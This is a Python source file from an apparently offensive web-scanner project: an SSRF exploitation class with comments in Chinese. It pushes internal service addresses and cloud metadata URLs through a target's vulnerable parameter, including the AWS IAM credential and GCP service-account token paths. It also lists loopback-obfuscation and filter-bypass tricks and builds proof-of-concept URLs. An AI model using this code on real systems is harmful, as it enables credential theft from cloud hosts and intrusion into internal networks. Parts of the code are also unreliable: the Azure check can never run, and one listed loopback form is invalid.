Files
xss_scanner_mix/xss_scanner/exploits/ssrf_exploit.py
2025-03-09 19:44:06 +08:00

527 lines
22 KiB
Python
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
SSRF服务器端请求伪造漏洞利用模块
"""
import logging
import re
import urllib.parse
import random
import string
import socket
import json
import ipaddress
logger = logging.getLogger('xss_scanner')
class SSRFExploit:
"""SSRF漏洞利用类"""
def __init__(self, http_client):
"""
初始化SSRF漏洞利用模块
Args:
http_client: HTTP客户端对象
"""
self.http_client = http_client
# 内部服务目标
self.internal_targets = [
"127.0.0.1", # 本地主机
"localhost", # 本地主机
"0.0.0.0", # 任意地址
"10.0.0.0/8", # 私有IP A类
"172.16.0.0/12", # 私有IP B类
"192.168.0.0/16", # 私有IP C类
"169.254.169.254", # AWS元数据服务
"metadata.google.internal", # GCP元数据
"100.100.100.200", # 阿里云元数据
"169.254.169.254", # Azure元数据
"127.0.0.1:25", # SMTP
"127.0.0.1:22", # SSH
"127.0.0.1:1433", # MS SQL
"127.0.0.1:3306", # MySQL
"127.0.0.1:5432", # PostgreSQL
"127.0.0.1:6379", # Redis
"127.0.0.1:9200", # Elasticsearch
"127.0.0.1:11211", # Memcached
"127.0.0.1:27017", # MongoDB
"127.0.0.1:8500", # Consul
"127.0.0.1:2375", # Docker API
"127.0.0.1:8080", # 常见Web服务
"127.0.0.1:8000", # 常见Web服务
"127.0.0.1:5000", # 常见Web服务
"127.0.0.1:3000" # 常见Web服务
]
# 内部服务路径
self.service_paths = {
"redis": ["/", ""],
"mysql": ["/", ""],
"elasticsearch": ["/", "/_cat/indices", "/_cluster/health"],
"mongodb": ["/", "/stats"],
"memcached": ["/", ""],
"docker": ["/", "/images/json", "/containers/json"],
"etcd": ["/", "/v2/keys", "/v2/members"],
"consul": ["/v1/catalog/services", "/v1/agent/self"],
"kubernetes": ["/api/v1/pods", "/api/v1/namespaces"]
}
# 云服务商元数据URL
self.cloud_metadata_urls = {
"aws": [
"http://169.254.169.254/latest/meta-data/",
"http://169.254.169.254/latest/meta-data/local-hostname",
"http://169.254.169.254/latest/meta-data/public-hostname",
"http://169.254.169.254/latest/meta-data/local-ipv4",
"http://169.254.169.254/latest/meta-data/public-ipv4",
"http://169.254.169.254/latest/meta-data/iam/security-credentials/"
],
"gcp": [
"http://metadata.google.internal/computeMetadata/v1/",
"http://metadata.google.internal/computeMetadata/v1/instance/hostname",
"http://metadata.google.internal/computeMetadata/v1/instance/id",
"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
],
"azure": [
"http://169.254.169.254/metadata/instance?api-version=2019-06-01",
"http://169.254.169.254/metadata/instance/compute?api-version=2019-06-01"
],
"alibaba": [
"http://100.100.100.200/latest/meta-data/",
"http://100.100.100.200/latest/meta-data/instance-id",
"http://100.100.100.200/latest/meta-data/region-id"
]
}
# IP替代表示法
self.ip_alternative_forms = {
"127.0.0.1": [
"localhost",
"127.0.1",
"127.1",
"2130706433", # 十进制表示
"0x7f000001", # 十六进制表示
"0177.0.0.01", # 八进制表示
"0177.0.0.1",
"0177.0.1",
"0177.1",
"::1", # IPv6表示
"::ffff:127.0.0.1", # IPv6 映射
"[::1]",
"[::ffff:127.0.0.1]",
"1278.1.1.1"
]
}
# SSRF绕过技术
self.ssrf_bypasses = [
"@", # URL认证绕过user:pass@host
"#", # URL片段
"?", # URL查询参数
"%23", # URL编码的#
"%3F", # URL编码的?
"\r\n", # CRLF注入
"%0D%0A", # URL编码的CRLF
"/.", # 目录遍历
"//" # 双斜杠
]
# 常见参数名
self.common_parameters = [
"url",
"uri",
"link",
"src",
"source",
"redirect",
"redirect_to",
"image",
"img",
"file",
"download",
"upload",
"domain",
"host",
"port",
"callback",
"return",
"return_to",
"next",
"target",
"feed",
"fetch",
"site",
"html",
"page",
"data",
"reference",
"reference_url"
]
def exploit(self, vulnerability):
"""
利用SSRF漏洞
Args:
vulnerability: 漏洞信息
Returns:
dict: 利用结果
"""
logger.info(f"尝试利用SSRF漏洞: {vulnerability['url']}")
url = vulnerability.get('url')
parameter = vulnerability.get('parameter')
payload = vulnerability.get('payload', '')
if not url or not parameter:
return {
'success': False,
'message': '缺少必要的漏洞信息(URL或参数名)',
'data': None
}
# 尝试探测内部服务
internal_services = []
successful_payloads = []
# 生成随机标记用于OAST带外应用安全测试
verification_id = ''.join(random.choice(string.ascii_lowercase) for _ in range(8))
oast_domain = f"ssrf-{verification_id}.example.com"
oast_url = f"http://{oast_domain}/"
logger.info(f"生成的OAST域名: {oast_domain}")
# 0. 首先尝试OAST探测如果有真实的回调服务器
if hasattr(self, 'callback_server') and self.callback_server:
logger.info("尝试使用OAST检测SSRF漏洞")
result = self._try_oast_detection(url, parameter, oast_url)
if result and result['success']:
return result
# 1. 尝试本地服务
logger.info("尝试探测本地服务")
for target in self.internal_targets[:5]: # 只尝试前5个目标
# 基本请求
result = self._try_internal_service(url, parameter, f"http://{target}")
if result and result['success']:
internal_services.append(result['data']['target'])
successful_payloads.append(result['data']['payload'])
logger.info(f"发现可访问的内部服务: {target}")
# 尝试一些端口如果目标是IP地址
if re.match(r"^\d+\.\d+\.\d+\.\d+$", target):
for port in [80, 8080, 8000, 5000, 3000, 22, 6379]:
result = self._try_internal_service(url, parameter, f"http://{target}:{port}")
if result and result['success']:
internal_services.append(f"{target}:{port}")
successful_payloads.append(result['data']['payload'])
logger.info(f"发现可访问的内部服务: {target}:{port}")
# 2. 尝试云服务商元数据
logger.info("尝试探测云服务商元数据")
cloud_metadata = {}
for provider, urls in self.cloud_metadata_urls.items():
for metadata_url in urls[:2]: # 只尝试前2个URL
result = self._try_internal_service(url, parameter, metadata_url)
if result and result['success']:
if provider not in cloud_metadata:
cloud_metadata[provider] = []
cloud_metadata[provider].append({
'url': metadata_url,
'response': result['data'].get('response', ''),
'payload': result['data']['payload']
})
successful_payloads.append(result['data']['payload'])
logger.info(f"发现可访问的云服务商元数据: {metadata_url}")
# 3. 尝试一些IP替代表示法绕过手段针对localhost
logger.info("尝试使用IP替代表示法绕过")
for alt_ip in self.ip_alternative_forms["127.0.0.1"][:5]: # 只尝试前5个替代表示
result = self._try_internal_service(url, parameter, f"http://{alt_ip}")
if result and result['success']:
internal_services.append(alt_ip)
successful_payloads.append(result['data']['payload'])
logger.info(f"通过IP替代表示法可访问本地服务: {alt_ip}")
# 编译结果
if internal_services or cloud_metadata:
logger.info(f"SSRF利用成功发现 {len(internal_services)} 个内部服务和 {len(cloud_metadata)} 个云服务商元数据")
# 选择一个最可靠的有效载荷作为PoC
poc_payload = successful_payloads[0] if successful_payloads else payload
# 构建 PoC URL
parsed_url = urllib.parse.urlparse(url)
query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
query_params[parameter] = poc_payload
new_query = urllib.parse.urlencode(query_params)
poc_url = urllib.parse.urlunparse((
parsed_url.scheme,
parsed_url.netloc,
parsed_url.path,
parsed_url.params,
new_query,
parsed_url.fragment
))
return {
'success': True,
'message': 'SSRF漏洞利用成功',
'data': {
'internal_services': internal_services,
'cloud_metadata': cloud_metadata,
'successful_payloads': successful_payloads
},
'poc': poc_url
}
else:
# 如果没有直接成功,返回手动验证步骤
logger.info("无法自动确认SSRF漏洞提供手动验证步骤")
return {
'success': False,
'message': '未能自动确认SSRF漏洞但可能存在请尝试手动验证',
'data': {
'parameter': parameter,
'url': url,
'oast_domain': oast_domain
},
'manual_steps': [
"1. 设置一个你控制的外部Web服务器记录所有接收到的请求",
f"2. 构造URL: {url}?{parameter}=http://your-server.com/ssrf-test",
"3. 如果你的服务器收到来自目标服务器的请求则确认存在SSRF漏洞",
"4. 尝试以下内部服务目标进行测试:",
" - http://localhost/",
" - http://127.0.0.1:8080/",
" - http://169.254.169.254/latest/meta-data/ (AWS元数据)",
"5. 尝试以下绕过技术:",
" - http://0177.0.0.1/ (八进制IP)",
" - http://0x7f000001/ (十六进制IP)",
" - http://2130706433/ (整数IP)"
]
}
def _try_internal_service(self, url, parameter, target_url):
"""
尝试通过SSRF访问内部服务
Args:
url: 目标URL
parameter: 参数名
target_url: 要访问的内部服务URL
Returns:
dict: 利用结果
"""
try:
logger.info(f"尝试访问内部服务: {target_url}")
# 构建SSRF测试URL
parsed_url = urllib.parse.urlparse(url)
query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
query_params[parameter] = target_url
# 重建查询字符串
new_query = urllib.parse.urlencode(query_params)
new_url = urllib.parse.urlunparse((
parsed_url.scheme,
parsed_url.netloc,
parsed_url.path,
parsed_url.params,
new_query,
parsed_url.fragment
))
# 发送请求
response = self.http_client.get(new_url)
# 检查响应查找SSRF成功的迹象
if response and response.status_code == 200:
response_text = response.text
# 检查常见的SSRF成功迹象
success_indicators = self._get_service_indicators(target_url)
for indicator in success_indicators:
if indicator in response_text:
logger.info(f"内部服务访问成功,找到特征: {indicator}")
return {
'success': True,
'message': f'成功利用SSRF漏洞访问内部服务: {target_url}',
'data': {
'target': target_url,
'parameter': parameter,
'payload': target_url,
'indicator': indicator,
'response': response_text[:200] + ('...' if len(response_text) > 200 else '')
}
}
# 如果没有找到明确的特征,检查是否有其他常见服务标识
if any(keyword in response_text.lower() for keyword in [
'apache', 'nginx', 'iis', 'server', 'service', 'redis', 'mysql',
'postgresql', 'mongodb', 'memcached', 'elasticsearch', 'forbidden', 'unauthorized',
'401', '403', 'authentication', 'password', 'login', 'admin', 'root', 'error',
'<title>', '<html>', 'json', 'xml', 'internal'
]):
logger.info(f"内部服务可能可以访问,发现常见服务标识")
return {
'success': True,
'message': f'可能成功利用SSRF漏洞访问内部服务: {target_url}',
'data': {
'target': target_url,
'parameter': parameter,
'payload': target_url,
'response': response_text[:200] + ('...' if len(response_text) > 200 else '')
}
}
# 如果HTTP状态码不是404可能成功了
if response.status_code not in [404, 400, 500]:
logger.info(f"内部服务响应了非错误状态码: {response.status_code}")
return {
'success': True,
'message': f'可能成功利用SSRF漏洞访问内部服务: {target_url}',
'data': {
'target': target_url,
'parameter': parameter,
'payload': target_url,
'status_code': response.status_code,
'response': response_text[:200] + ('...' if len(response_text) > 200 else '')
}
}
except Exception as e:
logger.error(f"尝试访问内部服务时出错: {str(e)}")
return None
def _try_oast_detection(self, url, parameter, callback_url):
"""
尝试使用OAST带外应用安全测试检测SSRF
Args:
url: 目标URL
parameter: 参数名
callback_url: 回调URL
Returns:
dict: 利用结果
"""
try:
logger.info(f"尝试OAST检测SSRF: {callback_url}")
# 构建SSRF测试URL
parsed_url = urllib.parse.urlparse(url)
query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
query_params[parameter] = callback_url
# 重建查询字符串
new_query = urllib.parse.urlencode(query_params)
new_url = urllib.parse.urlunparse((
parsed_url.scheme,
parsed_url.netloc,
parsed_url.path,
parsed_url.params,
new_query,
parsed_url.fragment
))
# 发送请求
response = self.http_client.get(new_url)
# 检查回调服务器是否收到请求(假设实现)
# 注意:这需要真实的回调服务器实现
if hasattr(self, 'check_callback') and self.check_callback(callback_url):
logger.info(f"检测到OAST回调确认SSRF漏洞")
return {
'success': True,
'message': '通过OAST成功确认SSRF漏洞',
'data': {
'callback_url': callback_url,
'parameter': parameter
},
'poc': new_url
}
except Exception as e:
logger.error(f"尝试OAST检测时出错: {str(e)}")
return None
def _get_service_indicators(self, target_url):
"""
获取目标服务的特征指标
Args:
target_url: 目标服务URL
Returns:
list: 特征指标列表
"""
indicators = []
# 提取主机和路径
try:
parsed_url = urllib.parse.urlparse(target_url)
host = parsed_url.netloc.split(':')[0]
path = parsed_url.path
# AWS元数据服务特征
if host == '169.254.169.254':
indicators = ['ami-id', 'instance-id', 'instance-type', 'local-hostname',
'local-ipv4', 'public-hostname', 'public-ipv4', 'security-credentials']
# GCP元数据服务特征
elif host == 'metadata.google.internal':
indicators = ['instance', 'attributes', 'service-accounts', 'project',
'hostname', 'image', 'machine-type']
# Azure元数据服务特征
elif host == '169.254.169.254' and 'metadata' in path:
indicators = ['vmId', 'compute', 'network', 'osType', 'location',
'resourceGroupName', 'apiVersion']
# 阿里云元数据服务特征
elif host == '100.100.100.200':
indicators = ['instance-id', 'region-id', 'zone-id', 'vpc-id',
'private-ipv4']
# Redis服务特征
elif host == '127.0.0.1' and '6379' in target_url:
indicators = ['redis_version', 'connected_clients', 'PONG', 'ERR',
'NOAUTH', 'AUTH']
# MySQL服务特征
elif host == '127.0.0.1' and '3306' in target_url:
indicators = ['mysql', 'SQL', 'MariaDB', 'syntax', 'Access denied',
'error', 'server version']
# Elasticsearch服务特征
elif host == '127.0.0.1' and ('9200' in target_url or 'elasticsearch' in target_url):
indicators = ['cluster_name', 'nodes', 'shards', 'indices', 'lucene_version',
'version', 'elasticsearch']
# MongoDB服务特征
elif host == '127.0.0.1' and '27017' in target_url:
indicators = ['mongodb', 'databases', 'collections', 'command',
'assertion', 'not authorized']
# Docker API特征
elif host == '127.0.0.1' and ('2375' in target_url or 'docker' in target_url):
indicators = ['containers', 'images', 'volumes', 'version',
'docker', 'Config', 'Id', 'Name']
# Web服务器标识
else:
indicators = ['apache', 'nginx', 'iis', 'server', 'web server', 'title',
'html', 'body', 'login', 'admin', 'index', 'welcome',
'404', '403', '401', '500', 'error', 'not found', 'forbidden']
except Exception as e:
logger.error(f"获取服务特征指标时出错: {str(e)}")
return indicators